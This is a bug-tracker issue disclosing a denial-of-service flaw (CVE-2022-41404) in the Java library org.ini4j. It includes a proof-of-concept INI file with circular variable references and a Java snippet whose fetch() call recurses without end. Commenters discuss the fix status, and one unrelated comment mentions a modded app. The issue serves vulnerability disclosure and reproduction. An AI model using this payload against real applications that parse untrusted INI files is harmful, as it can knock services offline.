
#56 The package org.ini4j before 0.5.4 is vulnerable when getting a value via the fetch() method in the BasicProfile class, which may lead to DoS attacks.

Milestone: v1.0 (example)
Status: open
Labels: bug (1)
Priority: 9
Updated: 2024-09-12
Created: 2022-09-20
Creator: bingdian
Private: No

Test logic usable to reproduce the behaviour
payload:
----payload.ini

[dopey]
 weight = ${bashful/weight}
 height = ${doc/height}

[bashful]
 weight = ${dopey/weight}
 height = ${dopey/height}

[doc]
 weight = 49.5
 height = 87.7

----java poc

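        // Requires: import java.io.File; import java.io.FileReader; import org.ini4j.Ini;
        Ini ini = new Ini();
        ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini")));
        // dopey/weight and bashful/weight reference each other, so resolving either one never terminates
        ini.get("dopey").fetch("weight");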

Discussion

  • Salvatore Bonaccorso

    @szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?

     
  • Marc Lafon

    Marc Lafon - 2022-11-02

    I have taken a quick look at the source code; the problem seems to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... The recursive loop is still present in version 0.54, without any limitation.

     
  • Craig

    Craig - 2023-10-03

    This issue was assigned CVE-2022-41404.

    It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?

     
  • Layne

    Layne - 2023-10-31

    Yeah I also have to use it in Remini mod apk. Can you confirm?

     

    Last edit: Layne 2023-10-31